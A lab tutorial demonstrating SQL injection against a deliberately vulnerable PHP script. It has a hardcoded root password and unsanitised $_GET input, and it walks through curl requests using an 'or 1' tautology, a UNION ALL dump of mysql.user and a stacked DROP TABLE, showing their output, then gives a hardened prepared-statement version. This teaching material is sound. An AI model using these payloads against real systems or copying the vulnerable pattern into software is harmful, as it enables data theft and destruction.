SQL injection queries

  1. Example: querying user accounts. The ?user=... parameter appended to the PHP URL is read with $_GET['user'] and used in the query; MYSQLI_NUM makes the result rows numerically indexed.
    [root@kvm8 ~]# cat /var/www/html/injection.php
    <?php
    $dbhost = 'localhost:3306';
    $dbuser = 'root';
    $dbpass = '123qwe';
    // connect to MariaDB; abort with the driver's error text on failure
    $conn = mysqli_connect($dbhost, $dbuser, $dbpass)
    	or die(mysqli_connect_error().PHP_EOL);
    mysqli_select_db( $conn, 'mysql' )
    	or die('Error: '.mysqli_error($conn).PHP_EOL);
    // the user-supplied value is interpolated straight into the SQL text:
    // this is the injection point demonstrated in the steps below
    $sql = "SELECT host,user FROM user WHERE user={$_GET['user']}";
    $retval = mysqli_query( $conn,$sql )
    	or die('Error: '.mysqli_error($conn).PHP_EOL);
    // MYSQLI_NUM: each row is returned as a numerically indexed array
    while($row = mysqli_fetch_array($retval, MYSQLI_NUM)) {
        echo "HOST: {$row[0]}<br>User: {$row[1]}<br>".
        "--------------------------------<br>";
    }
    mysqli_free_result($retval);
    echo "Fetched data successfully\n";
    mysqli_close($conn);
    ?>
    
  2. Appending ?user='root' to the PHP URL returns the host and user columns for that account.
    [root@kvm8 ~]# curl -s http://kvm8.deyu.wang/injection.php?"user='root'" | sed 's/<br> */\n/g'
    HOST: 127.0.0.1
    User: root
    --------------------------------
    HOST: ::1
    User: root
    --------------------------------
    HOST: kvm8.deyu.wang
    User: root
    --------------------------------
    HOST: localhost
    User: root
    --------------------------------
    Fetched data successfully
    
  3. Appending ?user='a' or 1 to the PHP URL makes the query return every account. In the example, %20 stands for a space: a space cannot be typed directly into the URL, otherwise $_GET reports an error.
    [root@kvm8 html]# curl -s http://kvm8.deyu.wang/injection.php?\
    "user='a'%20or%201" | sed 's/<br> */\n/g'
    HOST: 127.0.0.1
    User: root
    --------------------------------
    HOST: 192.168.122.1
    User: hosttest
    --------------------------------
    HOST: 192.168.122.1
    User: user2
    --------------------------------
    HOST: ::1
    User: root
    --------------------------------
    HOST: kvm8.deyu.wang
    User: root
    --------------------------------
    HOST: localhost
    User: dywang
    --------------------------------
    HOST: localhost
    User: root
    --------------------------------
    HOST: localhost
    User: user1
    --------------------------------
    HOST: localhost
    User: user3
    --------------------------------
    Fetched data successfully
    
  4. Appending ?user='a' union all select host,user from user to the PHP URL lists every host and user, because a union all .... clause can be injected into the query.
    [root@kvm8 html]# curl -s http://kvm8.deyu.wang/injection.php?"user=\
    'a'%20union%20all%20select%20host,user%20from%20user" | sed 's/<br> */\n/g'
    HOST: 127.0.0.1
    User: root
    --------------------------------
    HOST: 192.168.122.1
    User: hosttest
    --------------------------------
    HOST: 192.168.122.1
    User: user2
    --------------------------------
    HOST: ::1
    User: root
    --------------------------------
    HOST: kvm8.deyu.wang
    User: root
    --------------------------------
    HOST: localhost
    User: dywang
    --------------------------------
    HOST: localhost
    User: root
    --------------------------------
    HOST: localhost
    User: user1
    --------------------------------
    HOST: localhost
    User: user3
    --------------------------------
    Fetched data successfully
    
  5. Appending ?user='a'; drop table user to the PHP URL produces an error, because PHP's mysqli_query function accepts only a single statement; adding a semicolon to run a second statement is rejected.
    [root@kvm8 html]# curl -s http://kvm8.deyu.wang/injection.php?\
    "user='a';drop%20table%20user"
    Error: You have an error in your SQL syntax; check the manual that corresponds
     to your MariaDB server version for the right syntax to use near
     'drop table user' at line 1
    
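The hardened counterpart of injection.php, added here as an example and not part of the original page: it keeps the same query and the same output format but passes the user value through a mysqli prepared statement, connects with a least-privilege account instead of root, and escapes the values it echoes into HTML. The account name 'webapp', the password placeholder, the file name injection_safe.php and the allow-list pattern are assumptions. With the value bound as a parameter, each of the three inputs demonstrated above ('a' or 1, the union all select, and the stacked drop table) is compared as a literal string against the user column and simply returns no rows; the single-statement restriction of mysqli_query noted in step 5 is a property of that API call, not a defence, and the prepared statement is what actually closes the hole. $stmt->get_result() requires the mysqlnd driver, which is the default in current PHP builds.

```php
<?php
// injection_safe.php: hardened version of injection.php (added example, not the
// page's original code). Assumptions: same MariaDB server and mysql.user table;
// 'webapp' / 'CHANGE_ME' are placeholders for a least-privilege account that
// holds only SELECT on mysql.user instead of the root account used originally.
$dbhost = 'localhost';
$dbport = 3306;
$dbuser = 'webapp';      // placeholder: least-privilege account, not root
$dbpass = 'CHANGE_ME';   // placeholder

// Raise exceptions on driver errors so raw SQL error text is never echoed
// to the client (the original leaks the server's syntax error verbatim).
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);

try {
    $conn = new mysqli($dbhost, $dbuser, $dbpass, 'mysql', $dbport);

    // Optional allow-list on the input shape (MySQL account names are at most
    // 32 characters). The prepared statement below is the real protection; this
    // check only rejects obviously malformed requests early.
    $user = $_GET['user'] ?? '';
    if (!preg_match('/^[A-Za-z0-9_.-]{1,32}$/', $user)) {
        http_response_code(400);
        exit("Invalid user parameter\n");
    }

    // Prepared statement: the SQL text is fixed at prepare time and the value is
    // sent separately, so quotes, OR 1, UNION ALL or ; DROP TABLE inside $user
    // can only ever be compared literally against the user column.
    $stmt = $conn->prepare('SELECT host, user FROM user WHERE user = ?');
    $stmt->bind_param('s', $user);
    $stmt->execute();
    $result = $stmt->get_result();

    // Same numerically indexed rows and output layout as the original script,
    // with database values escaped before they are written into HTML.
    while ($row = $result->fetch_array(MYSQLI_NUM)) {
        echo 'HOST: ' . htmlspecialchars($row[0], ENT_QUOTES, 'UTF-8') . '<br>'
           . 'User: ' . htmlspecialchars($row[1], ENT_QUOTES, 'UTF-8') . '<br>'
           . '--------------------------------<br>';
    }
    $result->free();
    $stmt->close();
    echo "Fetched data successfully\n";
    $conn->close();
} catch (mysqli_sql_exception $e) {
    // Keep the real error server-side; the client gets a generic message.
    error_log('DB error in injection_safe.php: ' . $e->getMessage());
    http_response_code(500);
    echo "Database error\n";
}
?>
```

Requesting injection_safe.php?user=root returns the same four rows as step 2, while the inputs from steps 3 to 5 are rejected by the allow-list; even without that check, the bound parameter would turn them into a plain string comparison that matches no account, and the database error from step 5 can no longer occur because no second statement ever reaches the server.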



De-Yu Wang 2020-04-07